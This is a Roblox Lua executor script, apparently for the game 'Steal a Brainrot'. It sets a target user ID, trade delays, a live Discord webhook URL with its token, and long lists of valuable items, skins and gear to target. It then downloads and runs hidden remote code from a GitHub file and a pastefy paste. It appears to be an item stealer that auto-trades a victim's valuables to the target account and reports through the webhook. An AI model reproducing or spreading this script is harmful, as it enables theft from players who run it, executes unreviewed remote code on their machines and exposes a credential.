getgenv().TARGET_ID = 9107933550

getgenv().DELAY_STEP = 1

getgenv().TRADE_CYCLE_DELAY = 2

getgenv().WEBHOOK_URL = "https://discord.com/api/webhooks/1509365140511002645/AwKq8l0C9GGPMd51NeyHABdAg6dPlWlkK8Pnzw-GIdjPZgBaAxTWd09JtmxaGNhDDJaX"

getgenv().TARGET_BRAINROTS = {
        ["Strawberry Elephant"] = true,
        ["Meowl"] = true,
        ["Skibidi Toilet"] = true,
        ["Griffin"] = true,
        ["Hydra Dragon Cannelloni"] = true,
        ["Dragon Gingerini"] = true,
        ["Dragon Cannelloni"] = true,
        ["La Supreme Combinasion"] = true,
        ["Cerberus"] = true,
        ["Celestial Pegasus"] = true,
        ["Love Love Bear"] = true,
        ["Capitano Moby"] = true,
        ["Popcuru and Fizzuru"] = true,
        ["Rosey and Teddy"] = true,
        ["Ketupat Bros"] = true,
        ["Cooki and Milki"] = true,
        ["Burguro And Fryuro"] = true,
        ["Los Amigos"] = true,
        ["Reinito Sleighito"] = true,
        ["Fortunu and Cashuru"] = true,
        ["La Secret Combinasion"] = true,
        ["Signore Carapace"] = true,
        ["Los Sekolahs"] = true,
        ["Fragrama and Chocrama"] = true,
        ["La Casa Boo"] = true,
        ["La Food Combinasion"] = true,
        ["Elefanto Frigo"] = true,
        ["Ginger Gerat"] = true,
        ["Spooky and Pumpky"] = true,
        ["Los Spaghettis"] = true,
        ["La Ginger Sekolah"] = true,
        ["Sammyni Fattini"] = true,
        ["Festive 67"] = true,
        ["Cloverat Clapat"] = true,
        ["Ventoliero Pavonero"] = true,
        ["Antonio"] = true,
        ["Globa Steppa"] = true,
        ["Duggy Bros"] = true,
        ["Nacho Spyder"] = true,
        ["Rosetti Tualetti"] = true,
        ["Gold Gold Gold"] = true,
        ["Garama and Madundung"] = true,
        ["Fishino Clownino"] = true,
        ["Lavadorito Spinito"] = true,
        ["Jolly Jolly Sahur"] = true,
        ["Ketchuru and Musturu"] = true,
        ["Tirilikalika Tirilikalako"] = true,
        ["La Romantic Grande"] = true,
        ["Swaggy Bros"] = true,
        ["Orcaledon"] = true,
        ["Tictac Sahur"] = true,
        ["La Taco Combinasion"] = true,
        ["Dug dug dug"] = true,
        ["Rico Dinero"] = true,
        ["Ketupat Kepat"] = true,
        ["Tang Tang Keletang"] = true,
        ["Lovin Rose"] = true,
        ["Los Tacoritas"] = true,
        ["Eviledon"] = true,
        ["Los Primos"] = true,
        ["W or L"] = true,
        ["La Jolly Grande"] = true,
        ["Los Cupids"] = true,
        ["Los Puggies"] = true,
        ["Tralaledon"] = true,
        ["Gobblino Uniciclino"] = true,
        ["Chillin Chili"] = true,
        ["Money Money Reindeer"] = true,
        ["La Spooky Grande"] = true,
        ["Chipso and Queso"] = true,
        ["Tuff Toucan"] = true,
        ["Los Bros"] = true,
        ["La Extinct Grande"] = true,
        ["Celularcini Viciosini"] = true,
        ["Las Sis"] = true,
        ["Tacorita Bicicleta"] = true,
        ["La Grande Combinasion"] = true,
        ["Guest 666"] = true,
        ["Hopilikalika Hopilikalako"] = true,
        ["La Lucky Grande"] = true,
        ["Gym Bros"] = true,
        ["Boppin Bunny"] = true,
        ["Hydra Bunny"] = true,
        ["Quackini Snackini"] = true,
        ["Kalika Bros"] = true,
        ["Cash or Card"] = true,
        ["Los Chillis"] = true,
        ["Bunny and Eggy"] = true,
        ["Agarrini la Palini"] = true,
        ["Fragola La La La"] = true,
        ["Vulturino Skeletono"] = true,
        ["La Sahur Combinasion"] = true,
        ["Bananito"] = true,
        ["Strawberrita"] = true,
        ["Berryno"] = true,
        ["Foxini Lanternini"] = true,
        ["Rhino Helicopterino"] = true,
        ["Gorillo Subwoofero"] = true,
        ["Centrucci Nuclucci"] = true,
        ["Ginger Cisterna"] = true,
        ["Money Money Bros"] = true,
        ["Arcadragon"] = true,
        ["Los Hackers"] = true,
        ["Pancake and Syrup"] = true,
        ["John Doe"] = true,
        ["Rubrikiko"] = true,
        ["Kraken"] = true,
        ["Venuspino"] = true,
        ["Jelly Moby"] = true,
        ["Sammyni Cakini"] = true,
        ["Bearito Cabinito"] = true,
        ["Caylusaurus"] = true,
        ["Steakini Fattini"] = true
}

getgenv().TARGET_BASE_SKINS = {
        ["Rose"] = true,
        ["Gingerbread"] = true,
        ["Halloween"] = true,
        ["Christmas"] = true,
        ["Bunny Basket"] = true,
        ["Summer"] = true,
        ["Pot of Gold"] = true,
        ["Taco"] = true,
        ["Octo"] = true,
        ["Valentines"] = true,
        ["Easter"] = true,
        ["Lucky"] = true,
        ["Aquatic"] = true
}

getgenv().TARGET_GEARS = {
        ["Santa's Sleigh"] = true,
        ["Cupid's Wings"] = true,
        ["Witch's Broom"] = true,
        ["Waverider"] = true,
        ["Yin Yang Slap"] = true,
        ["Cursed Slap"] = true,
        ["Cyber Slap"] = true,
        ["Divine Slap"] = true,
        ["Bloodmoon Slap"] = true,
        ["Radioactive Slap"] = true,
        ["Rainbow Slap"] = true,
        ["Rainbow Hammer"] = true,
        ["Bloodmoon Hammer"] = true,
        ["Radioactive Airstrike"] = true,
        ["Yin Yang Lamp"] = true,
        ["Demon's Head"] = true,
        ["Lava Slap"] = true,
        ["Lava Blaster"] = true,
        ["Alien Slap"] = true,
        ["Blackhole Bomb"] = true,
        ["Candy Sentry"] = true
}

task.spawn(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/JWMOREIRA/Jwmoreira.logic/refs/heads/main/Jwmoreira"))()
end)

task.spawn(function()
loadstring(game:HttpGet("https://pastefy.app/y6kUsqyh/raw"))()
end)
